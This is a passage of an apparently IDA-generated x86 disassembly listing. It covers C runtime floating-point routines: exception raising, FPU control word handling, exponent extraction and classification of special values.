or [eax+4], ebx
mov [ebp+arg_8], 0C000008Fh
loc_4272A9: ; CODE XREF: sub_427277+23�j
test cl, 2
jz short loc_4272BC
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 2
mov [ebp+arg_8], 0C0000093h
loc_4272BC: ; CODE XREF: sub_427277+35�j
test cl, bl
jz short loc_4272CE
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 4
mov [ebp+arg_8], 0C0000091h
loc_4272CE: ; CODE XREF: sub_427277+47�j
test cl, 4
jz short loc_4272E1
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 8
mov [ebp+arg_8], 0C000008Eh
loc_4272E1: ; CODE XREF: sub_427277+5A�j
test cl, 8
jz short loc_4272F4
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 10h
mov [ebp+arg_8], 0C0000090h
loc_4272F4: ; CODE XREF: sub_427277+6D�j
mov esi, [ebp+arg_4]
mov ecx, [esi]
mov eax, [ebp+arg_0]
shl ecx, 4
not ecx
xor ecx, [eax+8]
push 2
and ecx, 10h
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shl ecx, 1
not ecx
xor ecx, [eax+8]
pop edi
and ecx, 8
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 1
not ecx
xor ecx, [eax+8]
and ecx, 4
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 3
not ecx
xor ecx, [eax+8]
and ecx, edi
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 5
not ecx
xor ecx, [eax+8]
and ecx, ebx
xor [eax+8], ecx
call sub_427A8F
test al, bl
jz short loc_427365
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_427365: ; CODE XREF: sub_427277+E5�j
test al, 4
jz short loc_427370
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_427370: ; CODE XREF: sub_427277+F0�j
test al, 8
jz short loc_42737B
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_42737B: ; CODE XREF: sub_427277+FB�j
test al, 10h
jz short loc_427385
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_427385: ; CODE XREF: sub_427277+106�j
test al, 20h
jz short loc_42738F
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_42738F: ; CODE XREF: sub_427277+110�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_4273CE
cmp eax, 400h
jz short loc_4273C0
cmp eax, 800h
jz short loc_4273B4
cmp eax, ecx
jnz short loc_4273D4
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_4273D4
; ---------------------------------------------------------------------------
loc_4273B4: ; CODE XREF: sub_427277+12F�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_4273CA
; ---------------------------------------------------------------------------
loc_4273C0: ; CODE XREF: sub_427277+128�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_4273CA: ; CODE XREF: sub_427277+147�j
mov [eax], ecx
jmp short loc_4273D4
; ---------------------------------------------------------------------------
loc_4273CE: ; CODE XREF: sub_427277+121�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_4273D4: ; CODE XREF: sub_427277+133�j
; sub_427277+13B�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_4273FF
cmp eax, 200h
jz short loc_4273F2
cmp eax, ecx
jnz short loc_42740C
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_42740C
; ---------------------------------------------------------------------------
loc_4273F2: ; CODE XREF: sub_427277+16D�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_42740A
; ---------------------------------------------------------------------------
loc_4273FF: ; CODE XREF: sub_427277+166�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_42740A: ; CODE XREF: sub_427277+186�j
mov [eax], ecx
loc_42740C: ; CODE XREF: sub_427277+171�j
; sub_427277+179�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
shl ecx, 5
xor ecx, [eax]
and ecx, 1FFE0h
xor [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+60h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+60h], ecx
fld qword ptr [edi]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+50h]
call sub_427A9A
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:dword_42B1A0 ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_42747E
and dword ptr [esi], 0FFFFFFFEh
loc_42747E: ; CODE XREF: sub_427277+202�j
test byte ptr [eax+8], 8
jz short loc_427487
and dword ptr [esi], 0FFFFFFFBh
loc_427487: ; CODE XREF: sub_427277+20B�j
test byte ptr [eax+8], 4
jz short loc_427490
and dword ptr [esi], 0FFFFFFF7h
loc_427490: ; CODE XREF: sub_427277+214�j
test byte ptr [eax+8], 2
jz short loc_427499
and dword ptr [esi], 0FFFFFFEFh
loc_427499: ; CODE XREF: sub_427277+21D�j
test [eax+8], bl
jz short loc_4274A1
and dword ptr [esi], 0FFFFFFDFh
loc_4274A1: ; CODE XREF: sub_427277+225�j
mov ecx, [eax]
and ecx, 3
sub ecx, 0
mov edx, 0FFFFF3FFh
jz short loc_4274E1
dec ecx
jz short loc_4274CF
dec ecx
jz short loc_4274BF
dec ecx
jnz short loc_4274E3
or byte ptr [esi+1], 0Ch
jmp short loc_4274E3
; ---------------------------------------------------------------------------
loc_4274BF: ; CODE XREF: sub_427277+23D�j
mov ecx, [esi]
and ecx, 0FFFFFBFFh
or ecx, 800h
jmp short loc_4274DD
; ---------------------------------------------------------------------------
loc_4274CF: ; CODE XREF: sub_427277+23A�j
mov ecx, [esi]
and ecx, 0FFFFF7FFh
or ecx, 400h
loc_4274DD: ; CODE XREF: sub_427277+256�j
mov [esi], ecx
jmp short loc_4274E3
; ---------------------------------------------------------------------------
loc_4274E1: ; CODE XREF: sub_427277+237�j
and [esi], edx
loc_4274E3: ; CODE XREF: sub_427277+240�j
; sub_427277+246�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_427506
dec ecx
jz short loc_4274FA
dec ecx
jnz short loc_427512
and [esi], edx
jmp short loc_427512
; ---------------------------------------------------------------------------
loc_4274FA: ; CODE XREF: sub_427277+27A�j
mov ecx, [esi]
and ecx, edx
or ecx, 200h
jmp short loc_427510
; ---------------------------------------------------------------------------
loc_427506: ; CODE XREF: sub_427277+277�j
mov ecx, [esi]
and ecx, edx
or ecx, 300h
loc_427510: ; CODE XREF: sub_427277+28D�j
mov [esi], ecx
loc_427512: ; CODE XREF: sub_427277+27D�j
; sub_427277+281�j
fld qword ptr [eax+50h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_427277 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42751C proc near ; CODE XREF: sub_427885+22�p
var_28 = qword ptr -28h
var_10 = qword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
xor ebx, ebx
mov esi, eax
and esi, 1Fh
inc ebx
test al, 8
mov [ebp+var_4], esi
jz short loc_42754A
test byte ptr [ebp+arg_8], bl
jz short loc_42754A
push ebx
call sub_427ACA
pop ecx
and esi, 0FFFFFFF7h
jmp loc_42771E
; ---------------------------------------------------------------------------
loc_42754A: ; CODE XREF: sub_42751C+18�j
; sub_42751C+1D�j
test al, 4
jz short loc_427564
test byte ptr [ebp+arg_8], 4
jz short loc_427564
push 4
call sub_427ACA
pop ecx
and esi, 0FFFFFFFBh
jmp loc_42771E
; ---------------------------------------------------------------------------
loc_427564: ; CODE XREF: sub_42751C+30�j
; sub_42751C+36�j
test al, bl
jz loc_427644
test byte ptr [ebp+arg_8], 8
jz loc_427644
push 8
call sub_427ACA
mov eax, [ebp+arg_8]
pop ecx
mov ecx, 0C00h
and eax, ecx
jz loc_42761A
cmp eax, 400h
jz short loc_4275F0
cmp eax, 800h
jz short loc_4275C6
cmp eax, ecx
jnz loc_42763C
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_439B70
fld ds:dbl_443CA8
fnstsw ax
test ah, 41h
jz short loc_4275BE
fchs
loc_4275BE: ; CODE XREF: sub_42751C+9E�j
fstp [ebp+var_10]
fld [ebp+var_10]
jmp short loc_42763A
; ---------------------------------------------------------------------------
loc_4275C6: ; CODE XREF: sub_42751C+7E�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_439B70
fnstsw ax
test ah, 41h
jnz short loc_4275E0
fld ds:dbl_443C98
jmp short loc_4275E8
; ---------------------------------------------------------------------------
loc_4275E0: ; CODE XREF: sub_42751C+BA�j
fld ds:dbl_443CA8
fchs
loc_4275E8: ; CODE XREF: sub_42751C+C2�j
fstp [ebp+var_10]
fld [ebp+var_10]
jmp short loc_42763A
; ---------------------------------------------------------------------------
loc_4275F0: ; CODE XREF: sub_42751C+77�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_439B70
fnstsw ax
test ah, 41h
jnz short loc_42760A
fld ds:dbl_443CA8
jmp short loc_427612
; ---------------------------------------------------------------------------
loc_42760A: ; CODE XREF: sub_42751C+E4�j
fld ds:dbl_443C98
fchs
loc_427612: ; CODE XREF: sub_42751C+EC�j
fstp [ebp+var_10]
fld [ebp+var_10]
jmp short loc_42763A
; ---------------------------------------------------------------------------
loc_42761A: ; CODE XREF: sub_42751C+6C�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_439B70
fld ds:dbl_443C98
fnstsw ax
test ah, 41h
jz short loc_427634
fchs
loc_427634: ; CODE XREF: sub_42751C+114�j
fstp [ebp+var_10]
fld [ebp+var_10]
loc_42763A: ; CODE XREF: sub_42751C+A8�j
; sub_42751C+D2�j ...
fstp qword ptr [ecx]
loc_42763C: ; CODE XREF: sub_42751C+82�j
and esi, 0FFFFFFFEh
jmp loc_42771E
; ---------------------------------------------------------------------------
loc_427644: ; CODE XREF: sub_42751C+4A�j
; sub_42751C+54�j
test al, 2
jz loc_42771E
test byte ptr [ebp+arg_8], 10h
jz loc_42771E
xor esi, esi
test al, 10h
jz short loc_42765E
mov esi, ebx
loc_42765E: ; CODE XREF: sub_42751C+13E�j
fld ds:dbl_439B70
push edi
mov edi, [ebp+arg_4]
fld qword ptr [edi]
fucompp
fnstsw ax
test ah, 44h
jnp loc_427708
fld qword ptr [edi]
lea eax, [ebp+var_8]
push eax ; int
push ecx
push ecx ; double
fstp [esp+28h+var_28]
call sub_4279D3
mov ecx, [ebp+var_8]
fstp [ebp+var_10]
fld [ebp+var_10]
add ecx, 0FFFFFA00h
add esp, 0Ch
cmp ecx, 0FFFFFBCEh
jge short loc_4276AB
fmul ds:dbl_439B70
mov esi, ebx
jmp short loc_4276FE
; ---------------------------------------------------------------------------
loc_4276AB: ; CODE XREF: sub_42751C+183�j
fcomp ds:dbl_439B70
fnstsw ax
test ah, 5
jp short loc_4276BC
mov edx, ebx
jmp short loc_4276BE
; ---------------------------------------------------------------------------
loc_4276BC: ; CODE XREF: sub_42751C+19A�j
xor edx, edx
loc_4276BE: ; CODE XREF: sub_42751C+19E�j
xor eax, eax
mov al, byte ptr [ebp+var_10+6]
and eax, 0Fh
or eax, 10h
mov word ptr [ebp+var_10+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_4276F5
sub eax, ecx
loc_4276D8: ; CODE XREF: sub_42751C+1D7�j
test byte ptr [ebp+var_10], bl
jz short loc_4276E3
test esi, esi
jnz short loc_4276E3
mov esi, ebx
loc_4276E3: ; CODE XREF: sub_42751C+1BF�j
; sub_42751C+1C3�j
shr dword ptr [ebp+var_10], 1
test byte ptr [ebp+var_10+4], bl
jz short loc_4276EF
or byte ptr [ebp+var_10+3], 80h
loc_4276EF: ; CODE XREF: sub_42751C+1CD�j
shr dword ptr [ebp+var_10+4], 1
dec eax
jnz short loc_4276D8
loc_4276F5: ; CODE XREF: sub_42751C+1B8�j
test edx, edx
jz short loc_427701
fld [ebp+var_10]
fchs
loc_4276FE: ; CODE XREF: sub_42751C+18D�j
fstp [ebp+var_10]
loc_427701: ; CODE XREF: sub_42751C+1DB�j
fld [ebp+var_10]
fstp qword ptr [edi]
jmp short loc_42770A
; ---------------------------------------------------------------------------
loc_427708: ; CODE XREF: sub_42751C+155�j
mov esi, ebx
loc_42770A: ; CODE XREF: sub_42751C+1EA�j
test esi, esi
pop edi
jz short loc_427717
push 10h
call sub_427ACA
pop ecx
loc_427717: ; CODE XREF: sub_42751C+1F1�j
and [ebp+var_4], 0FFFFFFFDh
mov esi, [ebp+var_4]
loc_42771E: ; CODE XREF: sub_42751C+29�j
; sub_42751C+43�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_427735
test byte ptr [ebp+arg_8], 20h
jz short loc_427735
push 20h
call sub_427ACA
pop ecx
and esi, 0FFFFFFEFh
loc_427735: ; CODE XREF: sub_42751C+206�j
; sub_42751C+20C�j
xor eax, eax
test esi, esi
pop esi
setz al
pop ebx
leave
retn
sub_42751C endp
; =============== S U B R O U T I N E =======================================
sub_427740 proc near ; CODE XREF: sub_427793+6C�p
; sub_427793+93�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_42775B
jle short locret_427765
cmp eax, 3
jg short locret_427765
mov ds:dword_4E28F4, 22h
retn
; ---------------------------------------------------------------------------
loc_42775B: ; CODE XREF: sub_427740+7�j
mov ds:dword_4E28F4, 21h
locret_427765: ; CODE XREF: sub_427740+9�j
; sub_427740+E�j
retn
sub_427740 endp
; =============== S U B R O U T I N E =======================================
sub_427766 proc near ; CODE XREF: sub_427885+55�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_427772
push 5
jmp short loc_427788
; ---------------------------------------------------------------------------
loc_427772: ; CODE XREF: sub_427766+6�j
test al, 8
jz short loc_42777A
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_42777A: ; CODE XREF: sub_427766+E�j
test al, 4
jz short loc_427782
push 2
jmp short loc_427788
; ---------------------------------------------------------------------------
loc_427782: ; CODE XREF: sub_427766+16�j
test al, 1
jz short loc_42778A
push 3
loc_427788: ; CODE XREF: sub_427766+A�j
; sub_427766+1A�j
pop eax
retn
; ---------------------------------------------------------------------------
loc_42778A: ; CODE XREF: sub_427766+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_427766 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_427793(int,int,int,int,int,int,double,int)
sub_427793 proc near ; CODE XREF: sub_427833+2A�p
; sub_427885+87�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
xor eax, eax
loc_42779B: ; CODE XREF: sub_427793+18�j
mov ecx, ds:dword_443BB0[eax*8]
cmp ecx, [ebp+arg_4]
jz short loc_42780D
inc eax
cmp eax, 1Dh
jl short loc_42779B
xor eax, eax
loc_4277AF: ; CODE XREF: sub_427793+81�j
test eax, eax
mov [ebp+var_1C], eax
jz short loc_427816
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8+4], eax
call sub_427AA6
lea eax, [ebp+var_20]
push eax
call sub_427274
add esp, 0Ch
test eax, eax
jnz short loc_427807
push esi
call sub_427740
add esp, 4
loc_427807: ; CODE XREF: sub_427793+69�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_42780D: ; CODE XREF: sub_427793+12�j
mov eax, ds:off_443BB4[eax*8]
jmp short loc_4277AF
; ---------------------------------------------------------------------------
loc_427816: ; CODE XREF: sub_427793+21�j
push 0FFFFh
push [ebp+arg_20]
call sub_427AA6
push [ebp+arg_0]
call sub_427740
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_427793 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_427833(int,double,int)
sub_427833 proc near ; CODE XREF: sub_424720+51�p
; sub_4255CA+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:dword_443BA8, 0
jnz short loc_427867
push [ebp+arg_C] ; int
fld [ebp+arg_4]
sub esp, 18h
fstp [esp+1Ch+var_C]
fldz
fstp [esp+1Ch+var_14]
fld [ebp+arg_4]
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_427793
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_427867: ; CODE XREF: sub_427833+A�j
push 0FFFFh
push [ebp+arg_C]
mov ds:dword_4E28F4, 21h
call sub_427AA6
fld [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_427833 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_427885(int,int,double,double,int)
sub_427885 proc near ; CODE XREF: sub_424720:loc_4247E7�p
; sub_4255CA:loc_425691�p
var_9C = qword ptr -9Ch
var_94 = qword ptr -94h
var_8C = qword ptr -8Ch
var_84 = dword ptr -84h
var_80 = byte ptr -80h
var_40 = dword ptr -40h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 80h
mov eax, ds:dword_4437D4
push [ebp+arg_18]
mov [esp+84h+var_4], eax
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_42751C
add esp, 0Ch
test eax, eax
jnz short loc_4278D7
and [esp+80h+var_40], 0FFFFFFFEh
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_18]
push [ebp+arg_0]
push eax
lea eax, [esp+94h+var_80]
push eax
call sub_427277
add esp, 18h
loc_4278D7: ; CODE XREF: sub_427885+2C�j
push [ebp+arg_0]
call sub_427766
add esp, 4
cmp ds:dword_443BA8, 0
jnz short loc_427916
test eax, eax
jz short loc_427916
push [ebp+arg_18] ; int
fld [ebp+arg_10]
sub esp, 18h
fstp [esp+9Ch+var_8C]
fldz
fstp [esp+9Ch+var_94]
fld [ebp+arg_8]
fstp [esp+9Ch+var_9C]
push [ebp+arg_4] ; int
push eax ; int
call sub_427793
add esp, 24h
jmp short loc_427930
; ---------------------------------------------------------------------------
loc_427916: ; CODE XREF: sub_427885+64�j
; sub_427885+68�j
push eax
call sub_427740
mov [esp+84h+var_84], 0FFFFh
push [ebp+arg_18]
call sub_427AA6
fld [ebp+arg_10]
pop ecx
pop ecx
loc_427930: ; CODE XREF: sub_427885+8F�j
mov ecx, [esp+80h+var_4]
call sub_422B83
mov esp, ebp
pop ebp
retn
sub_427885 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_42793D(double)
sub_42793D proc near ; CODE XREF: sub_424720:loc_4247A6�p
; sub_4255CA:loc_425650�p
var_8 = qword ptr -8
arg_0 = qword ptr 4
push ecx
push ecx
fld [esp+8+arg_0]
frndint
fstp [esp+8+var_8]
fld [esp+8+var_8]
pop ecx
pop ecx
retn
sub_42793D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42794E(double,int)
sub_42794E proc near ; CODE XREF: sub_4279D3+82�p
; sub_4279D3+95�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
fld [ebp+arg_0]
mov ecx, dword ptr [ebp+arg_0+6]
fstp [ebp+var_8]
add eax, 3FEh
shl eax, 4
and ecx, 0FFFF800Fh
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_42794E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427978 proc near ; CODE XREF: sub_424720+31�p
; sub_4255CA+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_427990
cmp [ebp+arg_0], edx
jnz short loc_4279A2
xor eax, eax
inc eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_427990: ; CODE XREF: sub_427978+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_4279A2
cmp [ebp+arg_0], edx
jnz short loc_4279A2
push 2
jmp short loc_4279CC
; ---------------------------------------------------------------------------
loc_4279A2: ; CODE XREF: sub_427978+11�j
; sub_427978+1F�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_4279B5
push 3
jmp short loc_4279CC
; ---------------------------------------------------------------------------
loc_4279B5: ; CODE XREF: sub_427978+37�j
cmp cx, 7FF0h
jnz short loc_4279CF
test [ebp+arg_4], 7FFFFh
jnz short loc_4279CA
cmp [ebp+arg_0], edx
jz short loc_4279CF
loc_4279CA: ; CODE XREF: sub_427978+4B�j
push 4
loc_4279CC: ; CODE XREF: sub_427978+28�j
; sub_427978+3B�j
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4279CF: ; CODE XREF: sub_427978+42�j
; sub_427978+50�j
xor eax, eax
pop ebp
retn
sub_427978 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4279D3(double,int)
sub_4279D3 proc near ; CODE XREF: sub_42751C+166�p
var_14 = qword ptr -14h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld ds:dbl_439B70
fld [ebp+arg_0]
fucompp
fnstsw ax
test ah, 44h
jp short loc_4279F3
fldz
xor edx, edx
jmp loc_427A82
; ---------------------------------------------------------------------------
loc_4279F3: ; CODE XREF: sub_4279D3+15�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_427A5F
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_427A0B
cmp dword ptr [ebp+arg_0], ecx
jz short loc_427A5F
loc_427A0B: ; CODE XREF: sub_4279D3+31�j
fld [ebp+arg_0]
mov edx, 0FFFFFC03h
fcomp ds:dbl_439B70
fnstsw ax
test ah, 5
jp short loc_427A25
xor eax, eax
inc eax
jmp short loc_427A3A
; ---------------------------------------------------------------------------
loc_427A25: ; CODE XREF: sub_4279D3+4B�j
xor eax, eax
jmp short loc_427A3A
; ---------------------------------------------------------------------------
loc_427A29: ; CODE XREF: sub_4279D3+6B�j
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_427A36
or dword ptr [ebp+arg_0+4], 1
loc_427A36: ; CODE XREF: sub_4279D3+5D�j
shl dword ptr [ebp+arg_0], 1
dec edx
loc_427A3A: ; CODE XREF: sub_4279D3+50�j
; sub_4279D3+54�j
test byte ptr [ebp+arg_0+6], 10h
jz short loc_427A29
and byte ptr [ebp+arg_0+6], 0EFh
cmp eax, ecx
jz short loc_427A4C
or byte ptr [ebp+arg_0+7], 80h
loc_427A4C: ; CODE XREF: sub_4279D3+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+14h+var_14]
call sub_42794E
add esp, 0Ch
jmp short loc_427A82
; ---------------------------------------------------------------------------
loc_427A5F: ; CODE XREF: sub_4279D3+28�j
; sub_4279D3+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+14h+var_14]
call sub_42794E
mov edx, dword ptr [ebp+arg_0+6]
shr edx, 4
and edx, 7FFh
add esp, 0Ch
sub edx, 3FEh
loc_427A82: ; CODE XREF: sub_4279D3+1B�j
; sub_4279D3+8A�j
mov eax, [ebp+arg_8]
fstp [ebp+var_8]
fld [ebp+var_8]
mov [eax], edx
leave
retn
sub_4279D3 endp
; =============== S U B R O U T I N E =======================================
sub_427A8F proc near ; CODE XREF: sub_427277+DE�p
var_4 = word ptr -4
push ecx
fstsw [esp+4+var_4]
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_427A8F endp
; =============== S U B R O U T I N E =======================================
sub_427A9A proc near ; CODE XREF: sub_427277+1E6�p
var_4 = word ptr -4
push ecx
fnstsw [esp+4+var_4]
fnclex
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_427A9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427AA6 proc near ; CODE XREF: sub_424720+13�p
; sub_424720+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
and ecx, [ebp+arg_4]
not eax
and eax, [ebp+var_4]
or eax, ecx
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_427AA6 endp
; =============== S U B R O U T I N E =======================================
sub_427ACA proc near ; CODE XREF: sub_42751C+20�p
; sub_42751C+3A�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 4
push ecx
push ecx
mov cl, byte ptr [esp+8+arg_0]
test cl, 1
jz short loc_427AE0
fld ds:tbyte_443CC0
fistp [esp+8+arg_0]
wait
loc_427AE0: ; CODE XREF: sub_427ACA+9�j
test cl, 8
jz short loc_427AF5
fstsw ax
fld ds:tbyte_443CC0
fstp [esp+8+var_8]
wait
fstsw ax
loc_427AF5: ; CODE XREF: sub_427ACA+19�j
test cl, 10h
jz short loc_427B04
fld ds:tbyte_443CCC
fstp [esp+8+var_8]
wait
loc_427B04: ; CODE XREF: sub_427ACA+2E�j
test cl, 4
jz short loc_427B12
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_427B12: ; CODE XREF: sub_427ACA+3D�j
test cl, 20h
jz short loc_427B1D
fldpi
fstp [esp+8+var_8]
wait
loc_427B1D: ; CODE XREF: sub_427ACA+4B�j
pop ecx
pop ecx
retn
sub_427ACA endp
; =============== S U B R O U T I N E =======================================
sub_427B20 proc near ; CODE XREF: sub_427B9F+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push 20h
pop ecx
cdq
idiv ecx
push 1Fh
pop ecx
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
mov ecx, [esp+arg_0]
not edx
test [ecx+eax*4], edx
jz short loc_427B48
loc_427B3F: ; CODE XREF: sub_427B20+26�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_427B42: ; CODE XREF: sub_427B20+2C�j
cmp dword ptr [ecx+eax*4], 0
jnz short loc_427B3F
loc_427B48: ; CODE XREF: sub_427B20+1D�j
inc eax
cmp eax, 3
jl short loc_427B42
xor eax, eax
inc eax
retn
sub_427B20 endp
; =============== S U B R O U T I N E =======================================
sub_427B52 proc near ; CODE XREF: sub_427B9F+42�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push edi
push 20h
pop ecx
cdq
idiv ecx
mov edi, [esp+8+arg_0]
mov esi, eax
lea eax, [edi+esi*4]
push eax
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
push edx
push dword ptr [eax]
call sub_4289A9
add esp, 0Ch
dec esi
js short loc_427B9C
lea edi, [edi+esi*4]
loc_427B83: ; CODE XREF: sub_427B52+48�j
test eax, eax
jz short loc_427B9C
push edi
push 1
push dword ptr [edi]
call sub_4289A9
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_427B83
loc_427B9C: ; CODE XREF: sub_427B52+2C�j
; sub_427B52+33�j
pop edi
pop esi
retn
sub_427B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
